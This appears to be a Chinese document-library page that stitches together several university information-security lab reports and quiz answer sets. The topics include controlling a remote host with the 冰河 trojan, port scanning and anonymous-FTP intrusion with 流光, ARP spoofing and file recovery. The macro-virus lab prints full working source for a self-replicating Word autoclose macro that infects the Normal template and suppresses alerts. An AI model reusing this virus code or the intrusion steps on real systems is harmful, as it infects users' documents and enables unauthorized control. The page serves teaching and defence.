当前位置：文档库 › 信息安全实验报告

信息安全实验报告

南昌航空大学实验报告

课程名称：信息安全实验名称：共五次实验

班级：姓名：同组人：

指导教师评定：签名：

实验一木马攻击与防范

一、实验目的

通过对木马的练习，使读者理解和掌握木马传播和运行的机制；通过手动删除木马，掌握检查木马和删除木马的技巧，学会防御木马的相关知识，加深对木马的安全防范意识。

二、实验原理

木马的全称为特洛伊木马，源自古希腊神话。木马是隐藏在正常程序中的具有特殊功能的恶意代码，是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。它隐藏在目标计算机里，可以随计算机自动启动并在某一端口监听来自控制端的控制信息。

1．木马的特性

(1)伪装性 (2)隐藏性 (3)破坏性 (4)窃密性

2．木马的入侵途径

木马入侵的主要途径是通过一定的欺骗方法，如更改图标、把木马文件与普通文件合并，欺骗被攻击者下载并执行做了手脚的木马程序，就会把木马安装到被攻击者的计算机中。

3．木马的种类

(1)按照木马的发展历程，可以分为4个阶段：第1代木马是伪装型病毒，第2代木马是网络传播型木马，第3代木马在连接方式上有了改进，利用了端口反弹技术，例如灰鸽子木马，第4代木马在进程隐藏方面做了较大改动，让木马服务器端运行时没有进程，网络操作插入到系统进程或者应用进程中完成，例如广外男生木马。

(2)按照功能分类，木马又可以分为：破坏型木马，主要功能是破坏并删除文件；服务型木马； DoS攻击型木马；远程控制型木马

三、实验环境

两台运行Windows 2000/XP的计算机，通过网络连接。使用“冰河”和“广外男生”木马作为练习工具。

四、实验内容和结果

任务一“冰河”木马的使用

1．使用“冰河”对远程计算机进行控制

我们在一台目标主机上植入木马，在此主机上运行G_Server，作为服务器端；在另一台主机上运行G_Client，作为控制端。

打开控制端程序，单击快捷工具栏中的“添加主机”按钮，弹出如图1-5所示对对话框。

图1-5添加计算机

“显示名称”：填入显示在主界面的名称。

“主机地址”：填入服务器端主机的IP地址。

“访问口令”：填入每次访问主机的密码，“空”即可。

“监听端口”：“冰河”默认的监听端口是7626，控制端可以修改它以绕过防火墙。

单击“确定”按钮，即可以看到主机面上添加了test的主机，如图1-6所示。

图1-6添加test主机

这时单击test主机名，如果连接成功，则会显示服务器端主机上的盘符。图1-6显示了test主机内的盘符，表示连接成功。

这时我们就可以像操作自己的电脑一样操作远程目标电脑，比如打开C:\WINNT\system32\config目录可以找到对方主机上保存用户口令的SAM文件。

“冰河”的大部分功能都是在这里实现的，单击“命令控制台”的标签，弹出命令控制台界面，如图1-7所示。

图1-7命令控制台界面

可以看到，命令控制台分为“口令类命令”、“控制类命令”、“网络类命令”、“文件类命令”、“注册表读写”、“设置类命令”。

3．删除“冰河”木马

任务二“广外男生”木马的使用

查看插入进程

删除注册表中木马文件

五，实验感想

通过本次实验了解的一些木马的传播技巧，通过自己动手实践，删除木马，学会了防御木马的一些基本技巧，加深了网络安全的认识。

实验二网络端口扫描

一、实验目的

通过练习使用网络端口扫描器，可以了解目标主机开放的端口和服务程序，从而获取系统的有用信息，发现网络系统的安全漏洞。在实验中，我们将在Windows操作系统下使用Superscan进行网络端口扫描实验，通过端口扫描实验，可以增强学生在网络安全方面的防护意识。利用综合扫描软件“流光”扫描系统的漏洞并给出安全性评估报告。

二、实验原理

(一)．端口扫描的原理

一个开放的网络端口就是一条与计算机进行通信的信道，对网络端口的扫描可以得到目标计算机开放的服务程序、运行的系统版本信息，从而为下一步的入侵做好准备。对网络端口的扫描可以通过执行手工命令实现，但效率较低；也可以通过扫描工具实现，效率较高。扫描工具是对目标主机的安全性弱点进行扫描

检测的软件。它一般具有数据分析功能，通过对端口的扫描分析，可以发现目标主机开放的端口和所提供的服务以及相应服务软件版本和这些服务及软件的安全漏洞，从而能及时了解目标主机存在的安全隐患。

1．端口的基础知识

端口是TCP协议中所定义的，TCP协议通过套接字(socket)建立起两台计算机之间的网络连接。TCP／UDP的端口号在0～65535范围之内，其中1024以下的端口保留给常用的网络服务。例如，21端口为FTP服务，23端口为TELNET服务，25端口为SMTP服务，80端口为HTTP服务，110端口为POP3服务等。

2．扫描的原理

扫描的方式有多种，为了理解扫描原理，需要对TCP协议简要介绍一下。

一个TCP头的数据包格式如图2-1所示。它包括6个标志位，其中：

图2-1 TCP数据包格式

扫描往往是入侵的前奏，所以如何有效的屏蔽计算机的端口，保护自身计算机的安全，成为计算机管理人员首要考虑的问题。为了防止对计算机网络端口的扫描，我们可以采用端口扫描监测工具来监测对端口的扫描，防止端口信息外露。常用的端口扫描监测工具包括ProtectX、PortSentry等。此外，安装防火墙也是防止端口扫描的有效方法。

三、实验环境

两台预装Windows 2000/XP的计算机，通过网络相连。SuperScan和流光Fluxay软件。

四、实验内容和步骤

任务一使用SuperScan扫描

SuperScan具有端口扫描、主机名解析、Ping扫描的功能，其界面如图2-2所示。

1．主机名解析功能

在Hostname Lookup栏中，可以输入IP地址或者需要转换的域名，单击Lookup按钮就可以获得转换后的结果；单击Me按钮可以获得本地计算机的IP 地址；单击Interfaces按钮可以获得本地计算机IP地址的详细设置。

2．端口扫描功能

图2-2 SuperScan操作界面

图2-3 端口配置界面

SuperScan也提供了特定端口扫描的功能，在Scan Type栏中选中All select ports in list，就可以按照选定的端口扫描。

3．Ping功能

SuperScan软件的Ping功能提供了检测在线主机和判断网络状况的作用。通过在IP栏中输入起始和结束的IP地址，然后选中Scan Type栏中的Ping only 即可单击Start启动Ping扫描了。

任务二利用流光综合扫描

流光是一款非常优秀的综合扫描工具，不仅具有完善的扫描功能，而且自带了很多猜测器和入侵工具，可方便地利用扫描的漏洞进行入侵。启动后，主界面

如图2-4所示。

图2-4主界面

1.扫描主机漏洞

(1)

图2-5扫描设置选项

然后，陆续单击“下一步”按钮，会弹出POP3版本信息和用户密码的对话

框以及获取FTP的Banner、尝试匿名登录等对话框，可根据需要进行选择，本

例以采用默认值。

图2-7 IPC设置选项

“下一步”，设置对IIS的漏洞扫描选项。之后点击“下一步”，弹出如图2-8所示对话框，这里流光提供了11个漏洞的扫描。可根据需要进行选择。

图2-8 PLUGINS设置选项

图2-9选项对话框

图2-10选择扫描引擎

选择默认的本地主机作为扫描引擎，单击“开始”按钮开始扫描，经过一段时间后，会有类似的扫描结果。

2.分析扫描结果并模拟入侵

(1)端口漏洞分析

我们发现被扫描主机开放的端口，有些开放的端口是极其不安全的，下面列举部分端口及其可能存在的威胁如下：

端口21：FTP端口，攻击者可能利用用户名和密码过于简单，甚至可以匿名登录的漏洞登录到目标主机上，并上传木马或者病毒而控制目标主机。

端口23：Telnet端口，如果目标主机开放23端口，但用户名和密码过于简单，攻击者破解后就可以登录主机并查看任何信息，甚至控制目标主机。

端口80：HTTP端口，此端口开放没有太大的危险，但如果目标主机有SQL 注入的漏洞，攻击者就可能利用端口80进行攻击。

端口139：NETBIOS会话服务端口，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。139端口可以被攻击者利用，建立IPC连接入侵目标主机，然后获得目标主机的root权限并放置木马。

端口443：网页浏览端口，主要用于HTTPS服务，是提供加密和通过安全端口传输的另一种HTTP。HTTPS服务一般是通过SSL来保证安全性的，但是SSL 漏洞可能会受到黑客的攻击，比如可以黑掉在线银行系统、盗取信用卡帐好等。

端口3389：这个端口的开放使安装了终端服务和全拼输入法的Windows 2000服务器（sp1之前的版本）存在着远程者很容易的拿到Administrator组权限。

(2)FTP漏洞分析

当扫描结果中看到FTP的端口开放，且可以匿名登录，我们就直接利用“流光”提供的入侵菜单进行FTP登录，单击密码破解成功的账号，然后选择connect，直接通过FTP连接到目标主机上。这样就可以往目标主机上传任何文件。包括木马和病毒，可见FTP匿名登录的危害性。

利用help命令，查看ftp命令

五、实验感想

本次试验，在Windows操作系统中安装并运行SuperScan，扫描目标主机端口，嗅探网络服务和操作系统，提交扫描步骤和扫描结果，在Windows操作系统中安装并运行“流光”，查看并记录自己的机器的扫描结果，是否存在安全漏洞，学习net相关命令的使用，尝试利用系统漏洞与目标主机建立连接

实验三脚本病毒和宏病毒分析

一、实验目的

通过这项实验旨在使学生掌握Office下宏病毒的基本原理，主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。

二、实验环境

操作系统环境：Windows98/NT/2000/XP 编程环境：Office VBA

三、实验基础知识要求

Office VBA编程环境

四、实验任务

1．任务性质：验证性实验

2．任务描述：下面的示例中给出的是一个Word宏病毒的示例程序（只有传染模块），仔细阅读源程序，掌握Word宏病毒的传染过程。

3．任务步骤：

（1）打开Word2000，新建一个文档名为“test”；

（2）点击“工具－宏－宏”，在对话框“宏的位置”选择“test”，在宏名中输入“autoclose”，然后点击“创建”按钮；

（3）在VBA编辑环境中输入示例程序中给出的代码，并保存，然后退出VBA；

（4）点击“工具－宏－宏”，在对话框中点击“管理器”按钮，在管理器对话框中点击“宏方案项”标签；在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”；

（5）点击“工具－宏－安全性”，在安全性对话框中的安全级标签中选择“低”，在可靠性来源标签中选择“信任对VB项目的访问”；

（6）保存并关闭“test”文档；

（7）新建一个文档test1，关闭后重新打开，观察test1是否被感染。

（8）清除此宏病毒，即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。

4．示例程序

Sub autoclose()

' autoclose Macro

' 宏在2005-8-26 由jingjd 创建

On Error Resume Next

Application.DisplayAlerts = wdAlertsNone

Application.EnableCancelKey = wdCancelDisabled

Application.DisplayStatusBar = False

'Options.VirusProtection = False

Options.SaveNormalPrompt = False

Const VirusName = "AOPEDMOK"

'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name

'MsgBox ActiveDocument.VBProject.VBComponents(2).Name

Set Doc = ActiveDocument.VBProject.VBComponents

Set Tmp = NormalTemplate.VBProject.VBComponents

Const ExportSource = "E:\aopedmok.txt"

For j = 1 To Doc.Count

If Doc(j).Name = VirusName Then

DocInstalled = 1

Doc(j).Export ExportSource

End If

Next j

For i = 1 To Tmp.Count

If Tmp(i).Name = VirusName Then

TmpInstalled = 1

Tmp(i).Export ExportSource

End If

Next i

If TmpInstalled = 0 Then

Tmp.Import ExportSource

NormalTemplate.Save

End If

If DocInstalled = 0 Then

Doc.Import ExportSource

ActiveDocument.SaveAs ActiveDocument.FullName

End If

MsgBox "HaHa,you are attacked!", 0, "Word,Macro"

End Sub

五、实验结果

1．首选方法：用最新版的反病毒软件清除宏病毒。使用反病毒软件是一种高效、安全和方便的清除方法，也是一般计算机用户的首选方法。但是宏病毒并不象某些厂商或麻痹大意的人那样认为的有所谓“广谱”的查杀软件，这方面的突出例子就是ETHAN宏病毒。

2..应急处理方法：用写字板或WORD 6.0文档作为清除宏病毒的桥梁。如果您的WORD 系统没有感染宏病毒，但需要打开某个外来的、已查出感染有宏病毒的文档，而手头现有的反病毒软件又无法查杀它们，那么您可以试验用下面的方法来查杀文档中的宏病毒：打开这个包含了宏病毒的文档（当然是启用WORD中的“宏病毒防护”功能并在宏警告出现时选择“取消宏”），然后在“文件”菜单中选择“另存为”，将此文档改存成写字板（RTF）格式或WORD6.0格式。

实验五、文件恢复工具的使用

一、实验目的：

了解文件被删除后恢复的方法和原理。

二、实验环境：

一台安装有Windows XP或Windows 2000操作系统的主机和EasyRecovery 软件。

三、EasyRecovery软件概述

EasyRecovery 是世界著名数据恢复公司Ontrack 的技术杰作。它是一个硬盘数据恢复工具，能够帮你恢复丢失的数据以及重建文件系统。其Professioanl （专业）版更是囊括了磁盘诊断、数据恢复、文件修复、E-mail 修复等全部 4 大类目19 个项目的各种数据文件修复和磁盘诊断方案。

EasyRecovery 不会向你的原始驱动器写入任何东西，它主要是在内存中重建

文件分区表，使数据能够安全地传输到其他驱动器中。你可以从被病毒破坏或是已经格式化的硬盘中恢复数据。

该软件可以恢复大于8.4GB的硬盘，支持长文件名。被破坏的硬盘中像丢失的引导记录、BIOS 参数数据块、分区表、FAT 表和引导区都可以由它来进行恢复。

功能简介：

1．恢复被删除的文件

在EasyRecovery主界面中选择“数据修复”，然后选择DeletedRecovery”进入修复删除文件向导，在第一步首先选择被删除文件所在分区，单击“下一步”按钮，软件会对该分区进行扫描，完成后会在窗口左边窗格中显示该分区的所有文件夹(包括已删除的文件夹)，右边窗格显示已经删除了的文件，可先浏览到被删除文件所在文件夹，然后就可以在右边的文件栏中看到该文件夹下已经删除的文件列表，选定要恢复的文件。

单击“下一步”按钮，先在“恢复到本地驱动器”处指定恢复的文件所保存的位置，这个位置必须是在另外一个分区中。单击“下一步”按钮即开始恢复文件，最后会显示文件恢复的相关信息，单击“完成”按钮后，就可以在设置的恢复的文件所保存的位置找到被恢复的文件。

文件夹的恢复也和文件恢复类似，只需选定已被删除的文件夹，其下的文件也会被一并选定，其后的步骤与文件恢复完全相同。另外，文件恢复功能也可由“数据修复”中的“AdanceRecovery”来实现。

2．恢复已格式化分区中的文件

在主界面的“数据修复”中选择“FormatRecovery”，接下来先选择已格式化的分区，然后扫描分区。扫描完成后，可看到EasyRecovery扫描出来的文件夹都以DIRXX(X是数字)命名，打开其下的子文件夹，名称没有发生改变，文件名也都是完整的，其后的步骤也和前面一样，先选定要恢复的文件夹或文件，然后指定恢复后的文件所保存的位置，最后将文件恢复在指定位置。

需要注意的是，在每一个已删除文件的后面都有一个“状况”标识，用字母来表示，它们的含义是不同的，G表示文件状况良好、完整无缺；D表示文件已经删除；B表示文件数据已损坏；S表示文件大小不符。总之，如果状况标记为G、D、X则表明该文件被恢复的可能性比较大，如果标记为B、A、N、S，则表明文件恢复成功的可能性会比较小。

3．从损坏的分区中恢复文件

如果分区和文件目录结构受损，可使用RAWRecovery从损坏分区中扫描并抢救出重要文件。RAWRecovery使用文件标识搜索算法从头搜索分区的每个簇，完全不依赖于分区的文件系统结构，也就是说只要是分区中的数据块都有可能被扫描出来，并判断出其文件类型，从而将文件恢复过来。

在主界面的“数据修复”中选择“RAWRecovery”，接下来先选择损坏的分区，

然后单击“文件类型”按钮，在出现的“RAWRecovery文件类型”对话框中添加、删除各种文件类型标识，以确定在分区中寻找哪种文件，比如要找Word文档，可将DOC文件标识出来，并单击“保存”按钮退出对话框，接下来的扫描就只针对DOC文件进行，这样目标更明确，速度也更快。恢复的后续步骤和前面完全一样。

4．修复损坏的文件

用前面方法恢复过来的数据有些可能已经损坏了，不过只要损坏得不是太严重就可以用EasyRecovery来修复。

选择主界面中的“文件修复”可以看到EasyRecovery可以修复五种文件：Access、Excel、PowerPiont、Word、ZIP。这些文件修复的方法是一样的，如修复ZIP文件，可选择ZIPRepair，然后在下一个步骤中选择“浏览文件”按钮导入要修复的ZIP文件，单击“下一步”按钮即可进行文件修复。这样的修复方法也可用于修复在传输和存储过程中损坏的文件。

四、实验内容：

任务一：

在本实验中，讲一个文件删除后采用EasyRecovery软件进行恢复。

（1）在一个磁盘上（以E盘为例）建立一个名为“重要文件.log”的文件，也可以是其他文件，然后采用“Shift+Delete”组合键删除。

（2）安装完EasyRecovery软件后，打开他的主界面，如图1所示。

图1 主界面

（3）单击主界面左面的“Data Recovery”选项，在选择其中的Advanced Recovery选项，如果2所示。

图2 选择数据恢复

（4）这时出现选择回复的磁盘界面，选择需要恢复的磁盘，请记录查找的结果。

五．实验感想

通过本次试验，我了解到了该文件恢复工具的具体使用，并且成功的恢复了删除，格式化的

文件。

信息安全基础实验报告

西安邮电大学通信与信息工程学院信息安全基础实验报告专业班级：安全1301班学生姓名：王方学号(班内序号): 03133023（23号） 2014 年 6 月 11 日 —————————————————————————— 装订线 ———————————————————————————————— 报告份数：

撰写内容提纲：一、引言本次实验主要练习了word排版以及visio制图和excel制表，在word排版中主要学习了页眉页脚设置和分栏，visio制图中主要学会了使用不同的形状与图形，excel中则主要练习了图表的绘制以及熟练了其中的一些基本操作。二、实验内容 1、Excel实验 1、（1）Excle题目（1）1、在“张名”前插入一个新行“张三 55 70 89 45 ” 2、用公式求出每个学生的“总分”。（2）1、将“美亚华电器集团”标题所在的那一行（A1:E1)合并为一个单元格。 2、将“年月”这一列的日期格式设为“1997年3月”格式.

（3）1、设置表格的文字格式为水平居中和垂直居中。 2、将标题“推销人员奖金计算表”设置为“黑体、16号字”，并于数据区上方单元格合并居中 3、各职工的奖金数据设置为饼图

（4）1.在数据末列后增加“工龄”字段，计算工龄(工龄计算至2000年。) 2.以“工龄”为主关键字按升序，“姓名”为次关键字按降序进行排序。 3.使用格式刷把表格的记录内容设为灰白相间的显示格式 4.设置表格数据字体颜色为蓝色加粗 5.设置表格数据区外框为红色双十线（5）1、将“基本工资、聘用补贴、保险基金、年收入等的数据格式设为加“￥”货币格式。 2、计算聘用补贴、保险基金、年收入。聘用补贴为基本工资＊δ，δ值：工人80％、助工80％、工程师150％、高工 250％；保险基金为基本工资的5％（月扣减）；年工资中加多一个月的工资。 3、计算基本工资、聘用补贴、保险基金、年收入总和。 4、加标题行“基本年收入情况”，要求黑体、三号，并横贯个数据列“跨列居中”

信息安全技术试题答案全面

信息安全技术试题及答案信息安全网络基础：一、判断题 1. 信息网络的物理安全要从环境安全和设备安全两个角度来考虑。√ 4. 计算机场地在正常情况下温度保持在 18~28 摄氏度。√ 8. 接地线在穿越墙壁、楼板和地坪时应套钢管或其他非金属的保护套管，钢管应与接地线做电气连通.√ 9. 新添设备时应该先给设备或者部件做上明显标记，最好是明显的无法除去的标记 ,以防更换和方便查找赃物。√ 11. 有很高使用价值或很高机密程度的重要数据应采用加密等方法进行保护。√ 12. 纸介质资料废弃应用碎纸机粉碎或焚毁。√ 容灾与数据备份一、判断题 2. 数据备份按数据类型划分可以分成系统数据备份和用户数据备份。√ 3. 对目前大量的数据备份来说，磁带是应用得最广的介质。√ 7. 数据越重要，容灾等级越高。√ 8. 容灾项目的实施过程是周而复始的。√ 二、单选题 1. 代表了当灾难发生后，数据的恢复程度的指标是 2. 代表了当灾难发生后，数据的恢复时间的指标是 3. 容灾的目的和实质是 A. 数据备份 B.心理安慰 C. 保持信息系统的业务持续性 D.系统的有益补充 4. 容灾项目实施过程的分析阶段，需要进行 A. 灾难分析 B. 业务环境分析 C. 当前业务状况分析 D. 以上均正确 5. 目前对于大量数据存储来说，容量大、成本低、技术成熟、广泛使用的介质是一一一。 A.磁盘 B. 磁带 c. 光盘 D. 自软盘 6. 下列叙述不属于完全备份机制特点描述的是一一一。 A. 每次备份的数据量较大 B. 每次备份所需的时间也就校长 C. 不能进行得太频繁 D. 需要存储空间小

A. 灾难预测 B.灾难演习 C. 风险分析 D.业务影响分析 8、IBM TSM Fastback 是一款什么软件（） A、防病毒产品； B、入侵防护产品； C、上网行为管理产品； D、数据存储备份产品 9、IBM TSM Fastback产品使用的什么技术（ ) A、磁盘快照； B、文件拷贝； C、ISCSI技术； D、磁盘共享 12、IBM TSM Fastback产品DR（远程容灾）功能备份的是什么（） A、应用系统； B、本地备份的数据； C、文件系统； D、数据库三、多选题 1. 信息系统的容灾方案通常要考虑的要点有一一。 A. 灾难的类型 B. 恢复时间 C. 恢复程度 D. 实用技术 E 成本 2. 系统数据备份包括的对象有一一一。 A. 配置文件 B.日志文件 C. 用户文档 D.系统设备文件 3. 容灾等级越高，则一一一。 A. 业务恢复时间越短 C. 所需要成本越高 B. 所需人员越多 D. 保护的数据越重要 4、数据安全备份有几种策略（） A、全备份； B、增量备份； C、差异备份； D、手工备份 5、建立Disaster Recovery（容灾系统）的前提是什么（）多选 A、自然灾害（地震、火灾，水灾...)； B、人为灾害（错误操作、黑客攻击、病毒发作...) C、技术风险（设备失效、软件错误、电力失效...） 6、IBM TSM Fastback 可以支持数据库系统包括（）多选 A、M S SQL； B、Oracle； C、DB2； D、MY SQL 7、IBM TSM Fastback 可以支持的存储介质包括（） A、磁带介质； B、磁盘介质； C、磁带库； D、磁盘柜基础安全技术系统安全一、判断题防火墙能帮助阻止计算机病毒和蠕虫进入用户的计算机，但该防火墙不能检测或清除已经感染计算机的病毒和蠕虫√ 8. 数据库管理员拥有数据库的一切权限。√ 9. 完全备份就是对全部数据库数据进行备份。√ 二、单选题系统的用户帐号有两种基本类型，分别是全局帐号和

《信息安全技术》实验4基于PGP的Email安全安全通信实验实验报告

《信息安全技术》实验4基于PGP的Email安全安全通信实验实验报告实验序号: 4 《信息安全技术》实验报告实验名称: 网络安全通信实验姓名: 学院: 计算机科学与工程学院专业: 网络工程班级: 学号: 指导教师: 实验地址: 实验日期: 常熟理工计算机科学与工程学院《信息安全技术》实验报告说明一(排版要求 1. 实验报告“文件名”按模板要求填写。例:《信息安全技术》实验报告.14网络1班.090214101.蔡同寒.实验1.数据加密实验.doc 2. 一级标题:顶格排版。汉字用宋体，阿拉伯数字用Times New Roman字体，四号字体，加粗。 3. 二级标题:顶格排版。汉字用宋体，阿拉伯数字用Times New Roman字体，小四号字体，加粗。 4. 三级标题:顶格排版。汉字用宋体，阿拉伯数字用Times New Roman字体，五号字体。

5. 正文:每段缩进量:2个汉字。两端对齐;汉字用宋体，阿拉伯数字用Times New Roman字体，五号字体。 6. 图形要求 (1) 在正文中要有引用。 (2) 要有图名，图名位于图的下方，汉字用宋体，阿拉伯数字用Times New Roman字体，五号字体。 (3) 图和图名“居中”。 7. 表格要求 (1) 在正文中要有引用。 (2) 要有表名，表名位于表的上方，汉字用宋体，阿拉伯数字用Times New Roman字体，五号字体。 (3) 表和表名“居中”。二(注意事项 1. 复制、拷贝、抄袭者取消成绩。 2. 没有安实验报告排版要求者不及格。 2 常熟理工计算机科学与工程学院《信息安全技术》实验报告实验3.2 基于PGP的Email安全通信实验 1. 请回答实验目的中的思考题。 1)网络通信中有哪些应用需要用到加密, ( 答: 压缩文件、电子邮箱和网络云盘等。 (2)在网络通信中如何安全交换密钥, 答: 1)密钥预分发 2)密钥在线分发 3)基于身份的密钥预分发

信息安全技术试题答案A

信息安全技术教程习题及答案第一章概述一、判断题 1。信息网络的物理安全要从环境安全和设备安全两个角度来考虑。√ 2。计算机场地可以选择在公共区域人流量比较大的地方。× 3。计算机场地可以选择在化工厂生产车间附近.× 4。计算机场地在正常情况下温度保持在 18~28 摄氏度。√ 5. 机房供电线路和动力、照明用电可以用同一线路。× 6。只要手干净就可以直接触摸或者擦拔电路组件，不必有进一步的措施。× 7. 备用电路板或者元器件、图纸文件必须存放在防静电屏蔽袋内,使用时要远离静电敏感器件。√ 8. 屏蔽室是一个导电的金属材料制成的大型六面体，能够抑制和阻挡电磁波在空气中传播.√ 9。屏蔽室的拼接、焊接工艺对电磁防护没有影响.× 10. 由于传输的内容不同，电力线可以与网络线同槽铺设。× 11. 接地线在穿越墙壁、楼板和地坪时应套钢管或其他非金属的保护套管，钢管应与接地线做电气连通.√ 12。新添设备时应该先给设备或者部件做上明显标记，最好是明显的无法除去的标记 ,以防更换和方便查找赃物。√ 13.TEMPEST 技术，是指在设计和生产计算机设备时，就对可能产生电磁辐射的元器件、集成电路、连接线、显示器等采取防辐射措施于从而达到减少计算机信息泄露的最终目的。√ 14. 机房内的环境对粉尘含量没有要求.× 15. 防电磁辐射的干扰技术,是指把干扰器发射出来的电磁波和计算机辐射出来的电磁波混合在一起，以掩盖原泄露信息的内容和特征等,使窃密者即使截获这一混合信号也无法提取其中的信息。√ 16。有很高使用价值或很高机密程度的重要数据应采用加密等方法进行保护。√ 17. 纸介质资料废弃应用碎纸机粉碎或焚毁。√ 二、单选题 1. 以下不符合防静电要求的是 A。穿合适的防静电衣服和防静电鞋 B. 在机房内直接更衣梳理 C。用表面光滑平整的办公家具 D. 经常用湿拖布拖地 2。布置电子信息系统信号线缆的路由走向时,以下做法错误的是 A. 可以随意弯折 B. 转弯时,弯曲半径应大于导线直径的 10 倍 C。尽量直线、平整 D. 尽量减小由线缆自身形成的感应环路面积 3。对电磁兼容性 (Electromagnetic Compatibility，简称 EMC）标准的描述正确的是 A. 同一个国家的是恒定不变的 B. 不是强制的 C。各个国家不相同 D. 以上均错误 4。物理安全的管理应做到 A. 所有相关人员都必须进行相应的培训，明确个人工作职责 B。制定严格的值班和考勤制度，安排人员定期检查各种设备的运行情况 C。在重要场所的迸出口安装监视器，并对进出情况进行录像

信息安全实验报告五分析

实验成绩《信息安全概论》实验报告实验五数字水印实验专业班级计科F1301 学号 201316010508姓名司如言完成时间_2016/5/24 1、实验目的理解数字水印的实现原理；通过演示程序加深对数字水印的理解，并完成水印嵌入和检测的代码编写。二、实验内容用演示软件实现在一幅图像中嵌入水印信息，对比嵌入水印前后的图像有无明显变化；用演示软件实现对一幅给定图像进行是否嵌入水印的检测；编写数字水印程序，分别实现水印的嵌入与检测。 3、实验环境和开发工具 1.Windows 7操作系统 2.AssureMark v2.0版 3.VC++ 6.0 4、实验步骤和结果 1. 数字水印程序演示用AssureMark软件实现嵌入水印信息，并对水印信息进行检测。 2、数字水印程序编写参考给定DLL中关于水印嵌入、提取函数的说明，编写代码分别实现水印的嵌入与检测。（1）调用DLL中的_ADDWATERMARK函数，实现水印嵌入。（2）调用DLL中的_GETWATERMARK函数，实现水印检测。 3、数字水印演示步骤 Step 1：在AssureMark程序主界面的“模式选择”域中选择“嵌入水印”，然后单击“打开”按钮，选择要嵌入水印信息的原始图像；单击“保存”按钮。具体操作如下图示:

图3.1嵌入水印信息设置 Step 2：关闭显示“水印信息嵌入成功”的提示窗口，嵌入水印信息前后的图像对比如图3.2所示，可以看出两者在视觉上并无明显差异。图3.2 嵌入水印信息前后的图像对比 Step 3：在程序主界面的“模式选择”域中选择“检测水印”，然后单击“打开”按钮，选择要检测是否嵌入水印信息的原始图像。“提取的水印信息”栏中显示提取到的水印信息“信息安全ISCC”，如下图所示：水印信息提取成功 4、将编写好的源代码输入计算机并进行调试分析，发现错误，再修改完善，最终实现实验所要求的功能。 1)给图像添加水印的函数 void CPrj_watermarkDlg::OnBtnImbed()

信息安全技术试题答案E.docx

信息安全技术试题答案E 信息安全试题（1/共3）一、单项选择题（每小题2分，共20分） 1._________________________ 信息安全的基木属性是o A.保密性 B.完整性 C.可用性、可控性、可靠性 D. A, B, C都是 2?假设使用一种加密算法，它的加密方法很简单：将每一个字母加5,即a加密成f。这种算法的密钥就是5,那么它属于 ________ o A.对称加密技术 B.分组密码技术 C.公钥加密技术 D.单向函数密码技术 3.密码学的目的是 ____ o A.研究数据加密 B.研究数据解密 C.研究数据保密 D.研究信息安全 4.A方有—?对密钥（KA公开，KA秘密），B方有-?对密钥（KB公开，KB秘密），A方向B方发送数字签名M,对信息M加密为：W = KB公开（KA秘密（M））。B方收到密文的解密方案是_______ o A. KB公开（KA秘密（M' ）） B. KA公开（KA公开（M'）） C. KA公开（KB秘密（M‘ ）） D. KB秘密（KA秘密（M'）） 5.数字签名要预先使用单向Hash函数进行处理的原因是______ o A.多一道加密工序使密文更难破译 B.提高密文的计算速度 C.缩小签名密文的长度，加快数字签名和验证签名的运算速度 D.保证密文能正确还原成明文 6.身份鉴别是安全服务小的重要一环，以下关于身份鉴别叙述不正确的是—o

A.身份鉴别是授权控制的基础 B.身份鉴别一般不用提供双向的认证 C.目前-?般采用基于对称密钥加密或公开密钥加密的方法 D.数字签名机制是实现身份鉴别的重要机制 7.防火墙用于将Internet和内部网络隔离______ 。 A.是防止Internet火灾的硬件设施 B.是网络安全和信息安全的软件和駛件设施 C.是保护线路不受破坏的软件和硬件设施 D.是起抗电磁干扰作川的硬件设施 8.PKI支持的服务不包括_____ 。 A.非对称密钥技术及证书管理 B.日录服务 C.对称密钥的产生和分发 D.访问控制服务9.设哈希函数H 128个可能的输出（即输出长度为128位）,如果II的k个随机输入屮至少有两个产生相同输岀的概率人于0. 5, 则k约等于—。 A. 2128 B. 264 C. 2 D. 2 10. Bell-LaPadula模型的出发点是维护系统的______ ,而Bibd模型与 Bell-LaPadula模型完全对立，它修正了Bell-LaPadula模型所忽略的信息的_______ 问题。它们存在共同的缺点：直接绑定主体与客体，授权工作困难。 A.保密性可用性 B.可用性保密性 C.保密性完整性 D.完整性保密性二、填空题（每空1分，共20分） 1.ISO 7498-2确定了五大类安全服务，即鉴别、访问控制、数据保密性、数据完整性和不可否认。同吋，ISO 7498-2也确定了八类安全机制，即加密机制、数据签名机制、访问控制机制、数据完整性机制、认证交换、业务填充机制、路由控制机制和公证机制。

信息安全实验报告

信息安全基础实验报告姓名：田廷魁学号：201227920316 班级：网工1201班 ARP欺骗工具及原理分析（Sniffer网络嗅探器）一．实验目的和要求实验目的： 1.熟悉ARP欺骗攻击有哪些方法。 2.了解ARP欺骗防范工具的使用。 3.掌握ARP欺骗攻击的实验原理。实验要求：下载相关工具和软件包(ARP攻击检测工具，局域网终结者，网络执法官，ARPsniffer嗅探工具)。二．实验环境（实验所用的软硬件） ARP攻击检测工具局域网终结者网络执法官 ARPsniffer嗅探工具三．实验原理 ARP（Address Resolution Protocol）即地址解析协议，是一种将IP地址转化成物理地址的协议。不管网络层使用什么协议，在网络链路上传送数据帧时，最终还是必须使用硬件地址的。而每台机器的MAC地址都是不一样的，具有全球唯一性，因此可以作为一台主机或网络设备的标识。目标主机的MAC地址就是通过ARP协议获得的。

ARP欺骗原理则是通过发送欺骗性的ARP数据包致使接收者收到数据包后更新其ARP缓存表，从而建立错误的IP与MAC对应关系，源主机发送数据时数据便不能被正确地址接收。四.实验内容与步骤 1、利用ARPsniffer嗅探数据实验须先安装winpcap.exe它是arpsniffer.exe运行的条件，接着在arpsniffer.exe同一文件夹下新建记事本，输入Start cmd.exe ,保存为cmd.bat。ARPsniffer有很多种欺骗方式，下面的例子是其中的一种。安装截图：

